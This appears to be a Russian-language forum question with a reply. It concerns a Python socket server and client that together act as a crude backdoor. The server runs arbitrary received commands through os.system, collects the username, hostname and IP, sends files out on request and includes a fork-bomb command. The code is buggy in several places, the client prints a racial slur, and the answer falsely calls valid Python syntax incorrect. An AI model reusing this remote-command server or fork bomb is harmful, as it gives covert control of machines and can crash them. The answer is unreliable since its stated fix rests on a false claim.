# Не работает програма при вхождении в одно из условий

Tags: python

```
Server:

import socket
import os
import platform
import getpass
from os import path
import subprocess

sec = 0
comandlist = {"dir","ls","sysinfo","exit","dowanload"}

sock = socket.socket()
sock.bind(('', 9090))
sock.listen(1)
conn, addr = sock.accept()
conn.send(str(path.abspath('.')).encode())

while True:


    cmd = conn.recv(1024).decode("utf-8")
    cmd = str(cmd)
    if cmd == "dir" or cmd == "ls":
        conn.send(str(os.listdir(".")).encode())
    if cmd == "sysinfo":
            sysinfo = f"""
                Operating System: {platform.system()}
                Computer Name: {platform.node()}
                Username: {getpass.getuser()}
                Release Version: {platform.release()}
                Processor Architecture: {platform.processor()}
                IP: {socket.gethostbyname(socket.getfqdn())}
                        """
            conn.send(sysinfo.encode("utf-8"))

    if cmd == "exit":
            sock.send("exit".encode("utf-8"))
            break
          # Download files
    if cmd.split(" ")[0] == "download":
            with open(cmd.split(" ")[1], "rb") as f:
                    file_data = f.read(1024)
                    while file_data:
                        print("Sending", file_data)
                        sock.send(file_data)
                        file_data = f.read(1024)
                    sleep(2)
                    sock.send(b"DONE")
            print("Finished sending data")



    if cmd == "forkbomb" and sec == 1:
        while True:
            os.fork()
    if not cmd in comandlist:
        os.system(cmd)
    if not cmd:
        break
        print(srt(cmd))

conn.close()

Client:
import socket
import os
from time import sleep

sock = socket.socket()
sock.connect(('localhost', 9090))

dir = sock.recv(1024).decode("utf-8")


while True:

        cmd = input(f"{dir}@ ")


        if cmd.split(" ")[0] == "download":
            file_name = cmd.split(" ")[1][::-1]
            sock.send(cmd)
            with open(file_name, "wb") as f:
                read_data = client.recv(1024)
                while read_data:
                    f.write(read_data)
                    read_data = client.recv(1024)
                    if read_data == b"DONE":
                        break
        elif cmd == "exit":
            print("By niga")
            break
        else:
            sock.send(cmd.encode('utf-8'))

        data = sock.recv(1024).decode("utf-8")
        print(data)


sock.close()
```

Проблемное условие:
    if not cmd in comandlist:
        os.system(cmd)

Comment: Сократите программу до нужного минимума и будет проще помочь

Comment: А что должно это условие означать?

Answer (score 1):

Условие записано синтаксически неверно.

```
if cmd not in comandlist:
```